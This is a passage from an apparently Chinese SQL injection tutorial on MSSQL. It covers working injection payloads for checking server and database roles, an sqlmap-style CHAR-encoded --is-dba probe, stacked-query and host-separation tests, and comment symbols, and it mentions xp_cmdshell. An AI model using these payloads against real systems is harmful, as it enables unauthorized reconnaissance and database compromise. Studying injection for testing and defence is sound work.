class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">);</span></code></span></span></p></li>
   </ol>

其查询方式与mysql的语法大同小异。

第二章 MSSQL信息收集

0x00 权限判断

服务器级别

我们可以在docs上面看到 IS_SRVROLEMEMBER('role'[,'login']) 函数 role 的有效值是用户定义的服务器角色和以下固定服务器角色:

返回类型:

返回值|描述 -|-| 0|login 不是 role 的成员。 1|login 是 role 的成员。 NULL|role 或 login 无效,或者没有查看角色成员身份的权限。

最终我们可以构造语句

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> is_srvrolemember</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'sysadmin'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">))</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> is_srvrolemember</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'serveradmin'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">))</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> is_srvrolemember</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'setupadmin'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">))</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> is_srvrolemember</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'securityadmin'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">))</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> is_srvrolemember</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'diskadmin'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">))</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> is_srvrolemember</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'bulkadmin'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">))</span></code></span></span></p></li>
   </ol>

我们在sqlmap中使用 –is-dba 也就是判断的你是否为管理员权限

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">*</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> admin </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">where</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> id </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> AND </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">5560</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> IN </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">SELECT </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">113</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">122</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">113</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">107</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">113</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">SELECT </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CASE WHEN </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">IS_SRVROLEMEMBER</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">115</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">121</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">115</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">97</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">100</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">109</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">105</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">110</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">))=</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> THEN CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">49</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> ELSE CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">48</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">END</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">))+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">113</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">118</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">112</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">120</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">113</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)))</span></code></span></span></p></li>
   </ol>

数据库级别的角色

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> IS_MEMBER</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'db_owner'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span></code></span></span></p></li>
   </ol>

0x01 基本信息

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@version</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">// 数据库版本</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">user </span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//获取当前数据库用户名</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">db_name</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">()</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">// 当前数据库名 其中db_name(N)可以来遍历其他数据库</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> user </span><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">//查询是否支持多语句</span></code></span></span></p></li>
   </ol>

0x02 判断站库分离

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">*</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> info </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">where</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> id</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'1'</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">and</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> host_name</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">()=@</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@servername</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;--</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'</span></code></span></span></p></li>
   </ol>

最简单的方法,当然你可以调用xp_cmdshell 就可以通过cmd来判断。

通过简单的判断数据库版本,当前用户权限,我们就可以想下一步怎么去做,比如2005的xp_cmdshell 你要知道他的权限一般是system 而2008他是nt authority\network service

第三章 MSSQL符号

0x00 注释符号

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">/* </span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">--</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="com" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;%00</span></code></span></span></p></li>
   </ol>

0x01 空白字符

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
